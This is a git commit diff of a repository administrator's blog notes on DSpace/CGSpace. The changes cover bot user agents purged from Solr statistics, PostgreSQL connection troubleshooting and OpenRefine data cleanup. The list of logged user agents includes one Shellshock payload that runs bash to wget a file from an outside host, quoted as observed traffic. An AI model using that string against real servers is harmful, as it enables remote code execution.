Add notes for 2022-03-04

This commit is contained in:
2022-03-04 15:30:06 +03:00
parent 7453499827
commit 27acbac859
115 changed files with 6550 additions and 6444 deletions

View File

@ -18,4 +18,56 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv >
<!--more-->
## 2022-03-04
- Looking over the CGSpace Solr statistics from 2022-02
- I see a few new bots, though once I expanded my search for user agents with "www" in the name I found so many more!
- Here are some of the more prevalent or weird ones:
- axios/0.21.1
- Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)
- Nutraspace/Nutch-1.2 (www.nutraspace.com)
- Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; webmaster@moreover.com)
- Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com
- Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)
- Crowsnest/0.5 (+http://www.crowsnest.tv/)
- Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com
- metha/0.2.27
- ZaloPC-win32-24v454
- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x
- ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)
- FullStoryBot/1.0 (+https://www.fullstory.com)
- Link Validity Check From: http://www.usgs.gov
- OSPScraper (+https://www.opensyllabusproject.org)
- () { :;}; /bin/bash -c \"wget -O /tmp/bbb www.redel.net.br/1.php?id=3137382e37392e3138372e313832\"
- I submitted [a pull request to COUNTER-Robots](https://github.com/atmire/COUNTER-Robots/pull/52) with some of these
- I purged a bunch of hits from the stats using the `check-spider-hits.sh` script:
```console
]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 6 hits from scalaj-http in statistics
Purging 5 hits from lua-resty-http in statistics
Purging 9 hits from AHC in statistics
Purging 7 hits from acebookexternalhit in statistics
Purging 1011 hits from axios\/[0-9] in statistics
Purging 2216 hits from Faveeo\/[0-9] in statistics
Purging 1164 hits from Moreover\/[0-9] in statistics
Purging 740 hits from Exploratodo\/[0-9] in statistics
Purging 585 hits from GroupHigh\/[0-9] in statistics
Purging 438 hits from Crowsnest\/[0-9] in statistics
Purging 1326 hits from nbertaupete95 in statistics
Purging 182 hits from metha\/[0-9] in statistics
Purging 68 hits from ZaloPC-win32-24v454 in statistics
Purging 1644 hits from Firefox\/x\.x in statistics
Purging 678 hits from ZoteroTranslationServer in statistics
Purging 27 hits from FullStoryBot in statistics
Purging 26 hits from Link Validity Check in statistics
Purging 26 hits from OSPScraper in statistics
Purging 1 hits from 3137382e37392e3138372e313832 in statistics
Purging 2755 hits from Nutch-[0-9] in statistics
Total number of bot hits purged: 12914
```
- I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project
<!-- vim: set sw=2 ts=2: -->

View File

@ -34,7 +34,7 @@ Last week I had increased the limit from 30 to 60, which seemed to help, but now
$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
78
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -126,7 +126,7 @@ $ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspac
<li>Looks like DSpace exhausted its PostgreSQL connection pool</li>
<li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
78
</code></pre><ul>
<li>For now I have increased the limit from 60 to 90, run updates, and rebooted the server</li>
@ -137,7 +137,7 @@ $ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspac
<li>Getting emails from uptimeRobot and uptimeButler that it&rsquo;s down, and Google Webmaster Tools is sending emails that there is an increase in crawl errors</li>
<li>Looks like there are still a bunch of idle PostgreSQL connections:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
96
</code></pre><ul>
<li>For some reason the number of idle connections is very high since we upgraded to DSpace 5</li>
@ -167,12 +167,12 @@ location ~ /(themes|static|aspects/ReportingSuite) {
<li>Need to check <code>/about</code> on CGSpace, as it&rsquo;s blank on my local test server and we might need to add something there</li>
<li>CGSpace has been up and down all day due to PostgreSQL idle connections (current DSpace pool is 90):</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
93
</code></pre><ul>
<li>I looked closer at the idle connections and saw that many have been idle for hours (current time on server is <code>2015-11-25T20:20:42+0000</code>):</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | less -S
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | less -S
datid | datname | pid | usesysid | usename | application_name | client_addr | client_hostname | client_port | backend_start | xact_start |
-------+----------+-------+----------+----------+------------------+-------------+-----------------+-------------+-------------------------------+-------------------------------+---
20951 | cgspace | 10966 | 18205 | cgspace | | 127.0.0.1 | | 37731 | 2015-11-25 13:13:02.837624+00 | | 20
@ -197,7 +197,7 @@ datid | datname | pid | usesysid | usename | application_name | client_addr
<li>Monitoring e-mailed in the evening to say CGSpace was down</li>
<li>Idle connections in PostgreSQL again:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
66
</code></pre><ul>
<li>At the time, the current DSpace pool size was 50&hellip;</li>
@ -215,7 +215,7 @@ db.statementpool = true
</code></pre><ul>
<li>And idle connections:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
49
</code></pre><ul>
<li>Perhaps I need to start drastically increasing the connection limits—like to 300—to see if DSpace&rsquo;s thirst can ever be quenched</li>

View File

@ -36,7 +36,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -137,7 +137,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
<li>CGSpace went down again (due to PostgreSQL idle connections of course)</li>
<li>Current database settings for DSpace are <code>db.maxconnections = 30</code> and <code>db.maxidle = 8</code>, yet idle connections are exceeding this:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
39
</code></pre><ul>
<li>I restarted PostgreSQL and Tomcat and it&rsquo;s back</li>
@ -189,7 +189,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
<li>CGSpace very slow, and monitoring emailing me to say its down, even though I can load the page (very slowly)</li>
<li>Idle postgres connections look like this (with no change in DSpace db settings lately):</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
29
</code></pre><ul>
<li>I restarted Tomcat and postgres&hellip;</li>
@ -214,7 +214,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
<li>CGSpace has been up and down all day and REST API is completely unresponsive</li>
<li>PostgreSQL idle connections are currently:</li>
</ul>
<pre tabindex="0"><code>postgres@linode01:~$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>postgres@linode01:~$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
28
</code></pre><ul>
<li>I have reverted all the pgtune tweaks from the other day, as they didn&rsquo;t fix the stability issues, so I&rsquo;d rather not have them introducing more variables into the equation</li>

View File

@ -28,7 +28,7 @@ Move ILRI collection 10568/12503 from 10568/27869 to 10568/27629 using the move_
I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.
Update GitHub wiki for documentation of maintenance tasks.
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -135,7 +135,7 @@ Update GitHub wiki for documentation of maintenance tasks.
<li>Tweak date-based facets to show more values in drill-down ranges (<a href="https://github.com/ilri/DSpace/issues/162">#162</a>)</li>
<li>Need to remember to clear the Cocoon cache after deployment or else you don&rsquo;t see the new ranges immediately</li>
<li>Set up recipe on IFTTT to tweet new items from the CGSpace Atom feed to my twitter account</li>
<li>Altmetrics' support for Handles is kinda weak, so they can&rsquo;t associate our items with DOIs until they are tweeted or blogged, etc first.</li>
<li>Altmetrics&rsquo; support for Handles is kinda weak, so they can&rsquo;t associate our items with DOIs until they are tweeted or blogged, etc first.</li>
</ul>
<h2 id="2016-01-21">2016-01-21</h2>
<ul>

View File

@ -38,7 +38,7 @@ I noticed we have a very interesting list of countries on CGSpace:
Not only are there 49,000 countries, we have some blanks (25)&hellip;
Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&rdquo;
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -145,15 +145,15 @@ Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&r
<li>In this case our country field is 78</li>
<li>Now find all resources with type 2 (item) that have null/empty values for that field:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value='' OR text_value IS NULL);
<pre tabindex="0"><code>dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value=&#39;&#39; OR text_value IS NULL);
</code></pre><ul>
<li>Then you can find the handle that owns it from its <code>resource_id</code>:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '22678';
<pre tabindex="0"><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = &#39;22678&#39;;
</code></pre><ul>
<li>It&rsquo;s 25 items so editing in the web UI is annoying, let&rsquo;s try SQL!</li>
</ul>
<pre tabindex="0"><code>dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value='';
<pre tabindex="0"><code>dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value=&#39;&#39;;
DELETE 25
</code></pre><ul>
<li>After that perhaps a regular <code>dspace index-discovery</code> (no -b) <em>should</em> suffice&hellip;</li>
@ -198,7 +198,7 @@ $ /opt/brew/Cellar/tomcat/8.0.30/bin/catalina start
<li>Add CATALINA_OPTS in <code>/opt/brew/Cellar/tomcat/8.0.30/libexec/bin/setenv.sh</code>, as this script is sourced by the <code>catalina</code> startup script</li>
<li>For example:</li>
</ul>
<pre tabindex="0"><code>CATALINA_OPTS=&quot;-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>CATALINA_OPTS=&#34;-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8&#34;
</code></pre><ul>
<li>After verifying that the site is working, start a full index:</li>
</ul>
@ -253,7 +253,7 @@ Swap: 255 57 198
<li>There are 1200 records that have PDFs, and will need to be imported into CGSpace</li>
<li>I created a <code>filename</code> column based on the <code>dc.identifier.url</code> column using the following transform:</li>
</ul>
<pre tabindex="0"><code>value.split('/')[-1]
<pre tabindex="0"><code>value.split(&#39;/&#39;)[-1]
</code></pre><ul>
<li>Then I wrote a tool called <a href="https://gist.github.com/alanorth/2206f24483fe5f0454fc"><code>generate-thumbnails.py</code></a> to download the PDFs and generate thumbnails for them, for example:</li>
</ul>
@ -278,13 +278,13 @@ Processing 64195.pdf
<li>Looking at CIAT&rsquo;s records again, there are some files linking to PDFs on Slide Share, Embrapa, UEA UK, and Condesan, so I&rsquo;m not sure if we can use those</li>
<li>265 items have dirty, URL-encoded filenames:</li>
</ul>
<pre tabindex="0"><code>$ ls | grep -c -E &quot;%&quot;
<pre tabindex="0"><code>$ ls | grep -c -E &#34;%&#34;
265
</code></pre><ul>
<li>I suggest that we import ~850 or so of the clean ones first, then do the rest after I can find a clean/reliable way to decode the filenames</li>
<li>This python2 snippet seems to work in the CLI, but not so well in OpenRefine:</li>
</ul>
<pre tabindex="0"><code>$ python -c &quot;import urllib, sys; print urllib.unquote(sys.argv[1])&quot; CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
<pre tabindex="0"><code>$ python -c &#34;import urllib, sys; print urllib.unquote(sys.argv[1])&#34; CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
</code></pre><ul>
<li>Merge pull requests for submission form theming (<a href="https://github.com/ilri/DSpace/pull/178">#178</a>) and missing center subjects in XMLUI item views (<a href="https://github.com/ilri/DSpace/pull/176">#176</a>)</li>
@ -294,7 +294,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
<ul>
<li>Turns out OpenRefine has an unescape function!</li>
</ul>
<pre tabindex="0"><code>value.unescape(&quot;url&quot;)
<pre tabindex="0"><code>value.unescape(&#34;url&#34;)
</code></pre><ul>
<li>This turns the URLs into human-readable versions that we can use as proper filenames</li>
<li>Run web server and system updates on DSpace Test and reboot</li>
@ -302,7 +302,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
<li>Then you create a facet for blank values on each column, show the rows that have values for one and not the other, then transform each independently to have the contents of the other, with &ldquo;||&rdquo; in between</li>
<li>Work on Python script for parsing and downloading PDF records from <code>dc.identifier.url</code></li>
<li>To get filenames from <code>dc.identifier.url</code>, create a new column based on this transform: <code>forEach(value.split('||'), v, v.split('/')[-1]).join('||')</code></li>
<li>This also works for records that have multiple URLs (separated by &ldquo;||&quot;)</li>
<li>This also works for records that have multiple URLs (separated by &ldquo;||&rdquo;)</li>
</ul>
<h2 id="2016-02-17">2016-02-17</h2>
<ul>
@ -325,7 +325,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
<ul>
<li>To change Spanish accents to ASCII in OpenRefine:</li>
</ul>
<pre tabindex="0"><code>value.replace('ó','o').replace('í','i').replace('á','a').replace('é','e').replace('ñ','n')
<pre tabindex="0"><code>value.replace(&#39;ó&#39;,&#39;o&#39;).replace(&#39;í&#39;,&#39;i&#39;).replace(&#39;á&#39;,&#39;a&#39;).replace(&#39;é&#39;,&#39;e&#39;).replace(&#39;ñ&#39;,&#39;n&#39;)
</code></pre><ul>
<li>But actually, the accents might not be an issue, as I can successfully import files containing Spanish accents on my Mac</li>
<li>On closer inspection, I can import files with the following names on Linux (DSpace Test):</li>
@ -353,7 +353,7 @@ Bitstream: tést señora alimentación.pdf
<li>Looking at the filenames for the CIAT Reports, some have some really ugly characters, like: <code>'</code> or <code>,</code> or <code>=</code> or <code>[</code> or <code>]</code> or <code>(</code> or <code>)</code> or <code>_.pdf</code> or <code>._</code> etc</li>
<li>It&rsquo;s tricky to parse those things in some programming languages so I&rsquo;d rather just get rid of the weird stuff now in OpenRefine:</li>
</ul>
<pre tabindex="0"><code>value.replace(&quot;'&quot;,'').replace('_=_','_').replace(',','').replace('[','').replace(']','').replace('(','').replace(')','').replace('_.pdf','.pdf').replace('._','_')
<pre tabindex="0"><code>value.replace(&#34;&#39;&#34;,&#39;&#39;).replace(&#39;_=_&#39;,&#39;_&#39;).replace(&#39;,&#39;,&#39;&#39;).replace(&#39;[&#39;,&#39;&#39;).replace(&#39;]&#39;,&#39;&#39;).replace(&#39;(&#39;,&#39;&#39;).replace(&#39;)&#39;,&#39;&#39;).replace(&#39;_.pdf&#39;,&#39;.pdf&#39;).replace(&#39;._&#39;,&#39;_&#39;)
</code></pre><ul>
<li>Finally import the 1127 CIAT items into CGSpace: <a href="https://cgspace.cgiar.org/handle/10568/35710">https://cgspace.cgiar.org/handle/10568/35710</a></li>
<li>Re-deploy CGSpace with the Google Scholar fix, but I&rsquo;m waiting on the Atmire fixes for now, as the branch history is ugly</li>

View File

@ -28,7 +28,7 @@ Looking at issues with author authorities on CGSpace
For some reason we still have the index-lucene-update cron job active on CGSpace, but I&rsquo;m pretty sure we don&rsquo;t need it as of the latest few versions of Atmire&rsquo;s Listings and Reports module
Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -128,7 +128,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<li>I identified one commit that causes the issue and let them know</li>
<li>Restart DSpace Test, as it seems to have crashed after Sisay tried to import some CSV or zip or something:</li>
</ul>
<pre tabindex="0"><code>Exception in thread &quot;Lucene Merge Thread #19&quot; org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
<pre tabindex="0"><code>Exception in thread &#34;Lucene Merge Thread #19&#34; org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
</code></pre><h2 id="2016-03-08">2016-03-08</h2>
<ul>
<li>Add a few new filters to Atmire&rsquo;s Listings and Reports module (<a href="https://github.com/ilri/DSpace/issues/180">#180</a>)</li>
@ -261,7 +261,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<ul>
<li>Abenet is having problems saving group memberships, and she gets this error: <a href="https://gist.github.com/alanorth/87281c061c2de57b773e">https://gist.github.com/alanorth/87281c061c2de57b773e</a></li>
</ul>
<pre tabindex="0"><code>Can't find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
<pre tabindex="0"><code>Can&#39;t find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
</code></pre><ul>
<li>I can reproduce the same error on DSpace Test and on my Mac</li>
<li>Looks to be an issue with the Atmire modules, I&rsquo;ve submitted a ticket to their tracker.</li>

View File

@ -32,7 +32,7 @@ After running DSpace for over five years I&rsquo;ve never needed to look in any
This will save us a few gigs of backup space we&rsquo;re paying for on S3
Also, I noticed the checker log has some errors we should pay attention to:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -150,7 +150,7 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290
******************************************************
</code></pre><ul>
<li>So this would be the <code>tomcat7</code> Unix user, who seems to have a default limit of 1024 files in its shell</li>
<li>For what it&rsquo;s worth, we have been setting the actual Tomcat 7 process' limit to 16384 for a few years (in <code>/etc/default/tomcat7</code>)</li>
<li>For what it&rsquo;s worth, we have been setting the actual Tomcat 7 process&rsquo; limit to 16384 for a few years (in <code>/etc/default/tomcat7</code>)</li>
<li>Looks like cron will read limits from <code>/etc/security/limits.*</code> so we can do something for the tomcat7 user there</li>
<li>Submit pull request for Tomcat 7 limits in Ansible dspace role (<a href="https://github.com/ilri/rmg-ansible-public/pull/30">#30</a>)</li>
</ul>
@ -159,10 +159,10 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290
<li>Reduce Amazon S3 storage used for logs from 46 GB to 6GB by deleting a bunch of logs we don&rsquo;t need!</li>
</ul>
<pre tabindex="0"><code># s3cmd ls s3://cgspace.cgiar.org/log/ &gt; /tmp/s3-logs.txt
# grep checker.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
# grep cocoon.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
# grep handle-plugin.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
# grep solr.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
# grep checker.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
# grep cocoon.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
# grep handle-plugin.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
# grep solr.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
</code></pre><ul>
<li>Also, adjust the cron jobs for backups so they only backup <code>dspace.log</code> and some stats files (.dat)</li>
<li>Try to do some metadata field migrations using the Atmire batch UI (<code>dc.Species</code> → <code>cg.species</code>) but it took several hours and even missed a few records</li>
@ -199,13 +199,13 @@ UPDATE 51258
<li>Looking at the DOI issue <a href="https://www.yammer.com/dspacedevelopers/#/Threads/show?threadId=678507860">reported by Leroy from CIAT a few weeks ago</a></li>
<li>It seems the <code>dx.doi.org</code> URLs are much more proper in our repository!</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://dx.doi.org%';
<pre tabindex="0"><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like &#39;http://dx.doi.org%&#39;;
count
-------
5638
(1 row)
dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://doi.org%';
dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like &#39;http://doi.org%&#39;;
count
-------
3
@ -231,11 +231,11 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and t
<li>I decided to keep the set of subjects that had <code>FMD</code> and <code>RANGELANDS</code> added, as it appears to have been requested to have been added, and might be the newer list</li>
<li>I found 226 blank metadatavalues:</li>
</ul>
<pre tabindex="0"><code>dspacetest# select * from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspacetest# select * from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
</code></pre><ul>
<li>I think we should delete them and do a full re-index:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
DELETE 226
</code></pre><ul>
<li>I deleted them on CGSpace but I&rsquo;ll wait to do the re-index as we&rsquo;re going to be doing one in a few days for the metadata changes anyways</li>
@ -294,7 +294,7 @@ UPDATE metadatavalue SET metadata_field_id=215 WHERE metadata_field_id=106
UPDATE 3872
UPDATE metadatavalue SET metadata_field_id=217 WHERE metadata_field_id=108
UPDATE 46075
$ JAVA_OPTS=&quot;-Xms512m -Xmx512m -Dfile.encoding=UTF-8&quot; ~/dspace/bin/dspace index-discovery -bf
$ JAVA_OPTS=&#34;-Xms512m -Xmx512m -Dfile.encoding=UTF-8&#34; ~/dspace/bin/dspace index-discovery -bf
</code></pre><ul>
<li>CGSpace was down but I&rsquo;m not sure why, this was in <code>catalina.out</code>:</li>
</ul>
@ -387,7 +387,7 @@ UPDATE 46075
<li>Basically, this gives us the ability to use the latest upstream stable 9.3.x release (currently 9.3.12)</li>
<li>Looking into the REST API errors again, it looks like these started appearing a few days ago in the tens of thousands:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Aborting context in finally statement&quot; dspace.log.2016-04-20
<pre tabindex="0"><code>$ grep -c &#34;Aborting context in finally statement&#34; dspace.log.2016-04-20
21252
</code></pre><ul>
<li>I found a recent discussion on the DSpace mailing list and I&rsquo;ve asked for advice there</li>
@ -423,7 +423,7 @@ UPDATE 46075
<li>Looks like the last one was &ldquo;down&rdquo; from about four hours ago</li>
<li>I think there must be something with this REST stuff:</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;Aborting context in finally statement&quot; dspace.log.2016-04-*
<pre tabindex="0"><code># grep -c &#34;Aborting context in finally statement&#34; dspace.log.2016-04-*
dspace.log.2016-04-01:0
dspace.log.2016-04-02:0
dspace.log.2016-04-03:0

View File

@ -34,7 +34,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
# awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l
3168
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -126,7 +126,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
<li>I have blocked access to the API now</li>
<li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l
3168
</code></pre><ul>
<li>The two most often requesters are in Ethiopia and Colombia: 213.55.99.121 and 181.118.144.29</li>
@ -166,8 +166,8 @@ LE_RESULT=$?
$SERVICE_BIN nginx start
if [[ &quot;$LE_RESULT&quot; != 0 ]]; then
echo 'Automated renewal failed:'
if [[ &#34;$LE_RESULT&#34; != 0 ]]; then
echo &#39;Automated renewal failed:&#39;
cat /var/log/letsencrypt/renew.log
@ -240,7 +240,7 @@ fi
</li>
<li>Found ~200 messed up CIAT values in <code>dc.publisher</code>:</li>
</ul>
<pre tabindex="0"><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to &quot;% %&quot;;
<pre tabindex="0"><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to &#34;% %&#34;;
</code></pre><h2 id="2016-05-13">2016-05-13</h2>
<ul>
<li>More theorizing about CGcore</li>
@ -259,7 +259,7 @@ fi
<li>They have thumbnails on Flickr and elsewhere</li>
<li>In OpenRefine I created a new <code>filename</code> column based on the <code>thumbnail</code> column with the following GREL:</li>
</ul>
<pre tabindex="0"><code>if(cells['thumbnails'].value.contains('hqdefault'), cells['thumbnails'].value.split('/')[-2] + '.jpg', cells['thumbnails'].value.split('/')[-1])
<pre tabindex="0"><code>if(cells[&#39;thumbnails&#39;].value.contains(&#39;hqdefault&#39;), cells[&#39;thumbnails&#39;].value.split(&#39;/&#39;)[-2] + &#39;.jpg&#39;, cells[&#39;thumbnails&#39;].value.split(&#39;/&#39;)[-1])
</code></pre><ul>
<li>Because ~400 records had the same filename on Flickr (hqdefault.jpg) but different UUIDs in the URL</li>
<li>So for the <code>hqdefault.jpg</code> ones I just take the UUID (-2) and use it as the filename</li>
@ -269,7 +269,7 @@ fi
<ul>
<li>More quality control on <code>filename</code> field of CCAFS records to make processing in shell and SAFBuilder more reliable:</li>
</ul>
<pre tabindex="0"><code>value.replace('_','').replace('-','')
<pre tabindex="0"><code>value.replace(&#39;_&#39;,&#39;&#39;).replace(&#39;-&#39;,&#39;&#39;)
</code></pre><ul>
<li>We need to hold off on moving <code>dc.Species</code> to <code>cg.species</code> because it is only used for plants, and might be better to move it to something like <code>cg.species.plant</code></li>
<li>And <code>dc.identifier.fund</code> is MOSTLY used for CPWF project identifier but has some other sponsorship things
@ -281,17 +281,17 @@ fi
</ul>
</li>
</ul>
<pre tabindex="0"><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
<pre tabindex="0"><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like &#39;PN%&#39; or text_value like &#39;PHASE%&#39; or text_value = &#39;CBA&#39; or text_value = &#39;IA&#39;);
</code></pre><h2 id="2016-05-20">2016-05-20</h2>
<ul>
<li>More work on CCAFS Video and Images records</li>
<li>For SAFBuilder we need to modify filename column to have the thumbnail bundle:</li>
</ul>
<pre tabindex="0"><code>value + &quot;__bundle:THUMBNAIL&quot;
<pre tabindex="0"><code>value + &#34;__bundle:THUMBNAIL&#34;
</code></pre><ul>
<li>Also, I fixed some weird characters using OpenRefine&rsquo;s transform with the following GREL:</li>
</ul>
<pre tabindex="0"><code>value.replace(/\u0081/,'')
<pre tabindex="0"><code>value.replace(/\u0081/,&#39;&#39;)
</code></pre><ul>
<li>Write shell script to resize thumbnails with height larger than 400: <a href="https://gist.github.com/alanorth/131401dcd39d00e0ce12e1be3ed13256">https://gist.github.com/alanorth/131401dcd39d00e0ce12e1be3ed13256</a></li>
<li>Upload 707 CCAFS records to DSpace Test</li>
@ -314,7 +314,7 @@ $ /home/dspacetest.cgiar.org/bin/dspace export -t COLLECTION -i 10568/79355 -d ~
</code></pre><ul>
<li>And then import to CGSpace:</li>
</ul>
